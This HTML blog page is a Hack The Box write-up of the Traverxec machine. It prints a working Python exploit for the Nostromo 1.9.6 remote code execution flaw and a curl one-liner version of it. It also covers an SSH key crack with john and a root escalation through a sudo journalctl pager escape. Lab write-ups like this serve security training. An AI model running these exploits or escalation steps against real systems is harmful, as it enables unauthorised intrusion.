<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset='utf-8'>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="stylesheet" href="/assets/css/style.css?v=">
    <link rel="stylesheet" type="text/css" href="/assets/css/print.css" media="print">
    <!--[if lt IE 9]>
    <script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
    <![endif]-->

<!-- Begin Jekyll SEO tag v2.8.0 -->
<title>HTB Writeup [Linux - Easy] - Traverxec | OmniSl4sh’s Blog</title>
<meta name="generator" content="Jekyll v4.2.2" />
<meta property="og:title" content="HTB Writeup [Linux - Easy] - Traverxec" />
<meta property="og:locale" content="en_US" />
<link rel="canonical" href="http://localhost:4000/2022/08/25/Traverxec.html" />
<meta property="og:url" content="http://localhost:4000/2022/08/25/Traverxec.html" />
<meta property="og:site_name" content="OmniSl4sh’s Blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2022-08-25T00:00:00+02:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="HTB Writeup [Linux - Easy] - Traverxec" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2022-08-25T00:00:00+02:00","datePublished":"2022-08-25T00:00:00+02:00","headline":"HTB Writeup [Linux - Easy] - Traverxec","mainEntityOfPage":{"@type":"WebPage","@id":"http://localhost:4000/2022/08/25/Traverxec.html"},"url":"http://localhost:4000/2022/08/25/Traverxec.html"}</script>
<!-- End Jekyll SEO tag -->

    <!-- start custom head snippets, customize with your own _includes/head-custom.html file -->

<!-- Setup Google Analytics -->



<!-- You can set your favicon here -->
<!-- link rel="shortcut icon" type="image/x-icon" href="/favicon.ico" -->

<!-- end custom head snippets -->

  </head>

  <body>
    <div id="container">
      <div class="inner">
        <header>
          <h1><a href="http://localhost:4000/">OmniSl4sh's Blog</a></h1>
          <h2></h2>
        </header>
        <!--<<section id="downloads" class="clearfix">
          
  
        </section>
        hr>-->
        <section id="main_content">
          <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">HTB Writeup [Linux - Easy] - Traverxec</h1>
    <p class="post-meta">
      <time class="dt-published" datetime="2022-08-25T00:00:00+02:00" itemprop="datePublished">Aug 25, 2022
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    <p><img src="/assets/Traverxec/Traverxec.png" alt="" /></p>

<h2 id="summary">Summary</h2>
<ul>
  <li><strong>Traverxec</strong> is a <strong>Linux</strong> machine hosting a <strong>web server</strong> called <strong>Nostromo</strong> and has <strong>SSH</strong> port open.</li>
  <li>The <strong>response headers</strong> from the webserver <strong>reveal its name and version</strong> which happens to be <strong>vulnerable to a Remote Code Execution vulnerability.</strong></li>
  <li><em>After troubleshooting the exploit and making a few modifications,</em> we get <strong>a shell</strong> as the <code class="language-plaintext highlighter-rouge">www-data</code> user.</li>
  <li><em>One the box, when going through the files</em> <strong><em>in the webroot,</em></strong> we find the <strong>Nostromo server’s configuration file.</strong></li>
  <li>It reveals that there’s <strong>an accessible area</strong> within the <code class="language-plaintext highlighter-rouge">david</code> user’s <strong>home directory</strong>. <em>There,</em> we find a <strong>private SSH key</strong> which was <strong>protected by a passphrase.</strong></li>
  <li>We manage to <strong>crack it</strong> using <code class="language-plaintext highlighter-rouge">john</code> and are able to <strong>login as</strong> <code class="language-plaintext highlighter-rouge">david</code>.</li>
  <li><em>In</em> <code class="language-plaintext highlighter-rouge">david</code><em>’s home path</em>, we find a <strong>folder containing a Bash script</strong> that issues a <code class="language-plaintext highlighter-rouge">journalctl</code> command with <code class="language-plaintext highlighter-rouge">sudo</code> <strong>privileges</strong> without requiring a password. We <strong>exploit that to get a shell</strong> as <code class="language-plaintext highlighter-rouge">root</code>.</li>
</ul>

<hr />

<h2 id="nmap">NMAP</h2>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-title: TRAVERXEC
|_http-server-header: nostromo 1.9.6
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
</code></pre></div></div>

<p><em>from</em> <code class="language-plaintext highlighter-rouge">nmap</code><em>’s output,</em> we notice from the <code class="language-plaintext highlighter-rouge">http-server-header</code> script that the web server is <strong>Nostromo version 1.9.6.</strong></p>

<p><em>but before we check for exploits,</em> we’ll first <strong>take a look at the website</strong> to see what’s there.</p>

<h2 id="the-website">The website</h2>
<p><img src="/assets/Traverxec/website-home-page.jpg" alt="" /></p>

<p><strong>static content</strong> for the most. Let’s move on :D</p>

<h2 id="searching-and-fixing-exploits">Searching and Fixing Exploits</h2>
<p>using <code class="language-plaintext highlighter-rouge">searchsploit</code> gets us <strong>two identical matches.</strong></p>

<p><img src="/assets/Traverxec/searchsploit.jpg" alt="" /></p>

<p><em>to go manual,</em> we pick the <strong>2nd Python script</strong> and <strong>look at the exploit code</strong> <em>(after removing the text art for clarity)</em></p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">#!/usr/bin/env python
</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="n">help_menu</span> <span class="o">=</span> <span class="s">'</span><span class="se">\r\n</span><span class="s">Usage: cve2019-16278.py &lt;Target_IP&gt; &lt;Target_Port&gt; &lt;Command&gt;'</span>

<span class="k">def</span> <span class="nf">connect</span><span class="p">(</span><span class="n">soc</span><span class="p">):</span>
    <span class="n">response</span> <span class="o">=</span> <span class="s">""</span>
    <span class="k">try</span><span class="p">:</span>
        <span class="k">while</span> <span class="bp">True</span><span class="p">:</span>
            <span class="n">connection</span> <span class="o">=</span> <span class="n">soc</span><span class="p">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
            <span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">connection</span><span class="p">)</span> <span class="o">==</span> <span class="mi">0</span><span class="p">:</span>
                <span class="k">break</span>
            <span class="n">response</span> <span class="o">+=</span> <span class="n">connection</span>
    <span class="k">except</span><span class="p">:</span>
        <span class="k">pass</span>
    <span class="k">return</span> <span class="n">response</span>

<span class="k">def</span> <span class="nf">cve</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">port</span><span class="p">,</span> <span class="n">cmd</span><span class="p">):</span>
    <span class="n">soc</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">()</span>
    <span class="n">soc</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">target</span><span class="p">,</span> <span class="nb">int</span><span class="p">(</span><span class="n">port</span><span class="p">)))</span>
    <span class="n">payload</span> <span class="o">=</span> <span class="s">'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0</span><span class="se">\r\n</span><span class="s">Content-Length: 1</span><span class="se">\r\n\r\n</span><span class="s">echo</span><span class="se">\n</span><span class="s">echo</span><span class="se">\n</span><span class="s">{} 2&gt;&amp;1'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span>
    <span class="n">soc</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">)</span>
    <span class="n">receive</span> <span class="o">=</span> <span class="n">connect</span><span class="p">(</span><span class="n">soc</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="n">receive</span><span class="p">)</span>

<span class="k">if</span> <span class="n">__name__</span> <span class="o">==</span> <span class="s">"__main__"</span><span class="p">:</span>

    <span class="k">try</span><span class="p">:</span>
        <span class="n">target</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span>
        <span class="n">port</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>
        <span class="n">cmd</span> <span class="o">=</span> <span class="n">sys</span><span class="p">.</span><span class="n">argv</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span>

        <span class="n">cve</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">port</span><span class="p">,</span> <span class="n">cmd</span><span class="p">)</span>

    <span class="k">except</span> <span class="nb">IndexError</span><span class="p">:</span>
        <span class="k">print</span><span class="p">(</span><span class="n">help_menu</span><span class="p">)</span>
</code></pre></div></div>

<p>it seems straightforward. Just a <strong>TCP connection</strong> and a <strong>POST request</strong>. Let’s give it a try:</p>

<p><img src="/assets/Traverxec/exploit-error.jpg" alt="" /></p>

<p>we get <strong>an error</strong> when running the code :/ But we <em>shouldn’t worry</em> when we’ve got <strong>Google</strong> :)</p>

<p>we search <strong>using the error message as a query</strong>. To find this answer on <a href="https://stackoverflow.com/questions/33054527/typeerror-a-bytes-like-object-is-required-not-str-when-writing-to-a-file-in">Stack Overflow</a>:</p>

<p><img src="/assets/Traverxec/stack-overflow-answer.jpg" alt="" /></p>

<p><em>following that,</em> we <strong>modify the code</strong> accordingly</p>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">def</span> <span class="nf">cve</span><span class="p">(</span><span class="n">target</span><span class="p">,</span> <span class="n">port</span><span class="p">,</span> <span class="n">cmd</span><span class="p">):</span>
    <span class="n">soc</span> <span class="o">=</span> <span class="n">socket</span><span class="p">.</span><span class="n">socket</span><span class="p">()</span>
    <span class="n">soc</span><span class="p">.</span><span class="n">connect</span><span class="p">((</span><span class="n">target</span><span class="p">,</span> <span class="nb">int</span><span class="p">(</span><span class="n">port</span><span class="p">)))</span>
    <span class="n">payload</span> <span class="o">=</span> <span class="s">'POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.0</span><span class="se">\r\n</span><span class="s">Content-Length: 1</span><span class="se">\r\n\r\n</span><span class="s">echo</span><span class="se">\n</span><span class="s">echo</span><span class="se">\n</span><span class="s">{} 2&gt;&amp;1'</span><span class="p">.</span><span class="nb">format</span><span class="p">(</span><span class="n">cmd</span><span class="p">)</span>
    <span class="n">soc</span><span class="p">.</span><span class="n">send</span><span class="p">(</span><span class="n">payload</span><span class="p">.</span><span class="n">encode</span><span class="p">())</span>  <span class="c1"># previously soc.send(payload)
</span>    <span class="n">receive</span> <span class="o">=</span> <span class="n">connect</span><span class="p">(</span><span class="n">soc</span><span class="p">)</span>
    <span class="k">print</span><span class="p">(</span><span class="n">receive</span><span class="p">)</span>
</code></pre></div></div>

<p>then <strong>rerun the exploit</strong></p>

<p><img src="/assets/Traverxec/no-feedback-exploit.jpg" alt="" /></p>

<p><strong>no feedback</strong> at all this time xD</p>

<p><em>But,</em> <strong><em>no feedback doesn’t necessarily mean no effect</em></strong></p>

<p><em>for blind situations like these</em>: it’s good to use something like <code class="language-plaintext highlighter-rouge">wget</code> to <strong>verify code execution.</strong></p>

<p><img src="/assets/Traverxec/code-execution-verified.jpg" alt="" /></p>

<p><strong>we’re good :D</strong> let’s get in with a <strong>netcat reverse shell.</strong></p>

<p><img src="/assets/Traverxec/got-shell.jpg" alt="" /></p>

<p><em>before going any further,</em> it’s nice to <strong>improve our shell</strong>. it’s done in the below steps:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># With whatever Python version you find, import the pty module and spawn a bash pty</span>
python <span class="nt">-c</span> <span class="s1">'import pty; pty.spawn("/bin/bash")'</span> <span class="o">||</span> python3 <span class="nt">-c</span> <span class="s1">'import pty; pty.spawn("/bin/bash")'</span>
<span class="c"># Press CTRL + Z</span>
<span class="nb">stty </span>raw <span class="nt">-echo</span>
<span class="nb">fg</span>
<span class="c"># Press Enter twice</span>
<span class="nb">export </span><span class="nv">SHELL</span><span class="o">=</span>/bin/bash <span class="o">&amp;&amp;</span> <span class="nb">export </span><span class="nv">TERM</span><span class="o">=</span>xterm-256color
<span class="c"># that's the size that fits my terminal. you can find yours with "stty size"</span>
<span class="nb">stty </span>rows 51 columns 228
</code></pre></div></div>

<h2 id="the-nostromo-config-file">The Nostromo config file</h2>
<p><em>Right after logging in,</em> we go into <code class="language-plaintext highlighter-rouge">/var/nostromo</code> and find a <strong>configuration file</strong> in the <code class="language-plaintext highlighter-rouge">conf</code> folder.</p>

<p><img src="/assets/Traverxec/nostromo-conf.jpg" alt="" /></p>

<p>A <strong>couple of interesting things</strong> show up:</p>
<ul>
  <li>a username: <code class="language-plaintext highlighter-rouge">david</code></li>
  <li>an <code class="language-plaintext highlighter-rouge">.htpasswd</code> file</li>
  <li>and a section on <code class="language-plaintext highlighter-rouge">HOMEDIRS</code></li>
</ul>

<p><code class="language-plaintext highlighter-rouge">david</code> was a <strong>local user</strong> on the system</p>

<p><img src="/assets/Traverxec/david-passwd.jpg" alt="" /></p>

<p>the <code class="language-plaintext highlighter-rouge">.htpasswd</code> file contains a hash. we <strong>cracked it</strong> with <code class="language-plaintext highlighter-rouge">john</code> and got a password:</p>

<p><img src="/assets/Traverxec/htpasswd-cracked.jpg" alt="" /></p>

<p>But that password <em>didn’t work</em> for either <code class="language-plaintext highlighter-rouge">root</code> or <code class="language-plaintext highlighter-rouge">david</code>.</p>

<p><img src="/assets/Traverxec/no-cred-reuse-for-htpassword.jpg" alt="" /></p>

<p>so we keep it around just in case..</p>

<h2 id="understanding-the-homedirs-feature">Understanding the HOMEDIRS feature</h2>
<p><em>previously,</em> we attempted to list the contents of <code class="language-plaintext highlighter-rouge">david</code>’s profile but got denied access.</p>

<p><img src="/assets/Traverxec/david-perm-denied.jpg" alt="" /></p>

<p><em>since the</em> <code class="language-plaintext highlighter-rouge">HOMEDIRS</code> <em>feature would give us access into</em> <code class="language-plaintext highlighter-rouge">david</code><em>’s directory,</em> we take <strong>a quick look</strong> at the <a href="https://www.nazgul.ch/dev/nostromo_man.html">online documentation</a> to understand how to use it:</p>

<p>note: <em>to make the page clearer for reading,</em> you may <strong>edit the CSS</strong> for the man page using the <strong>Chrome Dev Tools.</strong></p>

<p><img src="/assets/Traverxec/editing-site-css-for-clarity.jpg" alt="" /></p>

<p>We find that <strong>we can access a user’s folder over HTTP</strong> using the <code class="language-plaintext highlighter-rouge">~</code> followed by the <code class="language-plaintext highlighter-rouge">username</code>.</p>

<p>another thing is: users <strong>can define a certain directory to be shared</strong> through the <code class="language-plaintext highlighter-rouge">homedirs_public</code> option.</p>

<p><img src="/assets/Traverxec/homedirs_explained.jpg" alt="" /></p>

<p>we saw that one in <code class="language-plaintext highlighter-rouge">nhttpd.conf</code></p>

<p><img src="/assets/Traverxec/public_www.jpg" alt="" /></p>

<p>let’s first check the home directory <strong><em>from the outside</em></strong></p>

<p><img src="/assets/Traverxec/home-dir-website.jpg" alt="" /></p>

<p>there’s nothing in both the <strong>web page</strong> and the <strong>source code.</strong></p>

<p>a <code class="language-plaintext highlighter-rouge">gobuster</code> <strong>brute force</strong> didn’t get us anything new either.</p>

<p><em>Since the</em> <code class="language-plaintext highlighter-rouge">public_www</code> <em>folder</em> <strong>should be</strong> <em>in</em> <code class="language-plaintext highlighter-rouge">david</code><em>’s home directory,</em> we tried to <strong><em>blindly</em></strong> change into it.</p>

<p><img src="/assets/Traverxec/public_www-violated.jpg" alt="" /></p>

<p>And <strong>it worked!</strong> plus we found something that could give us access.</p>

<p>we <strong>copy the archive</strong> to <code class="language-plaintext highlighter-rouge">/tmp</code> where we <strong>extract</strong> it. Inside, we find a <strong>protected</strong> <code class="language-plaintext highlighter-rouge">id_rsa</code> that we need to crack:</p>

<p><img src="/assets/Traverxec/id_rsa_found.jpg" alt="" /></p>

<p>we first <strong>convert</strong> it to a hash using <code class="language-plaintext highlighter-rouge">ssh2john</code> and <strong>crack it</strong> using <code class="language-plaintext highlighter-rouge">john</code> to get a password: “hunter”</p>

<p><img src="/assets/Traverxec/id_rsa_cracked.jpg" alt="" /></p>

<p>we then <strong>changed the permissions</strong> on the SSH key (<code class="language-plaintext highlighter-rouge">chmod 600 &lt;KEY_FILE&gt;</code>) and used it to access the machine as <code class="language-plaintext highlighter-rouge">david</code></p>

<p><img src="/assets/Traverxec/ssh-as-david.jpg" alt="" /></p>

<h2 id="exploiting-sudo-journalctl-for-privesc">Exploiting SUDO journalctl for Privesc</h2>
<p><em>Right after logging in,</em> we see <strong>a folder that sticks out</strong>: <code class="language-plaintext highlighter-rouge">bin</code></p>

<p>it had a script <code class="language-plaintext highlighter-rouge">server-status.sh</code> and another file called <code class="language-plaintext highlighter-rouge">server-stats.head</code></p>

<p><img src="/assets/Traverxec/bin-folder-plus-script.jpg" alt="" /></p>

<p>looking at their contents:</p>

<p><img src="/assets/Traverxec/bin-files-breakdown.jpg" alt="" /></p>

<p>the <code class="language-plaintext highlighter-rouge">server-stats.head</code> was just ASCII art.</p>

<p>But, within <code class="language-plaintext highlighter-rouge">server-status.sh</code> are all <strong>commands for checking the status of the Nostromo server</strong> <em>just like the name says</em></p>

<p>the <strong>exploitable part</strong> here is the <code class="language-plaintext highlighter-rouge">sudo</code> command:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>/usr/bin/sudo /usr/bin/journalctl <span class="nt">-n5</span> <span class="nt">-unostromo</span>.service
</code></pre></div></div>

<p>that’s because <code class="language-plaintext highlighter-rouge">journalctl</code> <strong><em>can be escaped for a shell with the same privileges</em></strong>.</p>

<p>A quick look on <a href="https://gtfobins.github.io/gtfobins/journalctl/#sudo">GTFOBins</a> can confirm that.</p>

<p><img src="/assets/Traverxec/gtfo-bins-journalctl.jpg" alt="" /></p>

<p>the trick is that it <strong><em>“invokes the default pager”.</em></strong></p>

<p>A pager is a <strong>program</strong> that <strong>helps the user view the output of a command</strong> <strong><em>one page at a time</em></strong>.
This is done by <strong>getting the size of rows of the terminal</strong> and <strong>only displaying that many lines.</strong></p>

<p>Paging tools you’re probably familiar with are <code class="language-plaintext highlighter-rouge">more</code> and <code class="language-plaintext highlighter-rouge">less</code>. Both of which can be <strong><em>escaped for a shell</em></strong> ;]</p>

<p>Let’s first <strong>run the script</strong> to see <em>if it asks for a password or not.</em></p>

<p><img src="/assets/Traverxec/script-test-run.jpg" alt="" /></p>

<p>It ran <strong><em>without prompting us for authentication.</em></strong></p>

<p>this means that the command <code class="language-plaintext highlighter-rouge">/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service</code> is available for <code class="language-plaintext highlighter-rouge">david</code> without him needing to provide a password.</p>

<p><em>To exploit this,</em> we run the command.</p>

<p><strong><em>But because the output is too small,</em></strong> <strong>the pager isn’t called.</strong></p>

<p><img src="/assets/Traverxec/no-pager-invoked.jpg" alt="" /></p>

<p>We use <code class="language-plaintext highlighter-rouge">stty</code> as a quick-and-dirty trick to <strong>shrink our tty.</strong></p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">stty </span>rows 20 columns 20
</code></pre></div></div>

<p><img src="/assets/Traverxec/pager-invoked.jpg" alt="" /></p>

<p><em>From the highlighted line,</em> we know <strong>we have a pager</strong> which can be <strong>turned into a bash shell</strong> with <code class="language-plaintext highlighter-rouge">!/bin/bash</code></p>

<p><img src="/assets/Traverxec/rooted.jpg" alt="" /></p>

<p><strong>Owned :D</strong></p>

<h2 id="rewriting-the-nostromo-exploit">Rewriting the Nostromo exploit</h2>
<p><em>After some brief testing, and</em> <strong><em>for the sake of simplicity,</em></strong> we <strong>re-wrote the the exploit</strong> for Nostromo as a <code class="language-plaintext highlighter-rouge">curl</code> one-liner:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-s</span> <span class="nt">-X</span> <span class="s1">$'POST'</span> <span class="nt">-H</span> <span class="s1">$'Content-Length: 1'</span> <span class="nt">--data-binary</span> <span class="s1">$'</span><span class="se">\x</span><span class="s1">0d</span><span class="se">\x</span><span class="s1">0aecho</span><span class="se">\x</span><span class="s1">0d</span><span class="se">\x</span><span class="s1">0aecho</span><span class="se">\x</span><span class="s1">0d</span><span class="se">\x</span><span class="s1">0a&lt;COMMAND&gt;'</span> <span class="s1">$'http://&lt;HOSTNAME&gt;:&lt;PORT&gt;/.%0d./.%0d./.%0d./.%0d./bin/sh'</span> <span class="o">&gt;</span>/dev/null
</code></pre></div></div>

<p><img src="/assets/Traverxec/exploit-rewritten.jpg" alt="" /></p>

  </div><a class="u-url" href="/2022/08/25/Traverxec.html" hidden></a>
</article>

        </section>

        <footer>
        
          This page was generated by <a href="https://pages.github.com">GitHub Pages</a>.
        </footer>

      </div>
    </div>
  </body>
</html>